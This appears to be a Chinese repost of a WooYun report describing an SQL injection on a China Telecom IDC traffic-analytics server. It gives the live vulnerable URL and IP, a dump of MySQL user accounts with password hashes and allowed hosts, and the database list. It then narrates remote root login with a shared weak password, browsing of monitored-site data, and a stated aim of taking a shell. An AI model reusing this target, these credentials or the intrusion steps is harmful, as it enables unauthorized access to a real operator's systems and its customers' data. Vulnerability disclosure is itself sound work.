转的wooyun
发现的比较的偶然~入侵的比较愕然~
1.偶然间发现的电信的比较奇葩SQL注入漏洞(貌似是为监控客户网站的访问情况),该情况可能在电信IDC具有通用性,测试地址http://118.123.206.9/preuid.php?uid=2610023800
Web Server: Apache/2.2.23 (Unix) PHP/5.4.7
Powered-by: PHP/5.4.7
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.5.28-log
Current DB: analytics
System User: root@localhost
Host Name: localhost.localdomain
Installation dir: /usr
DB User & Pass: root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:localhost
root::localhost.localdomain
root::127.0.0.1
::localhost
::localhost.localdomain
remote:*A4B6157319038724E3560894F7F932C8886EBFCF:%
root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:%
hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.9
web:*A4B6157319038724E3560894F7F932C8886EBFCF:%
hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.7
Data Bases: information_schema
IDC
analytics
mysql
netflow
performance_schema
rec_web
report
report1
test
web
web_test
zj
前台没啥看的~
2.数据库权限还是root,好吧看来数据库允许web,remote用户外连,而且都是相同的弱口令,ok~那就来telnet下看是否默认端口吧~~~
bingo~还是root权限~
3.看看有啥好东西没~貌似监控了不少网站~
4.好吧~既然这样了,不拿shell都对不起自己了~(提权已经没啥意义了)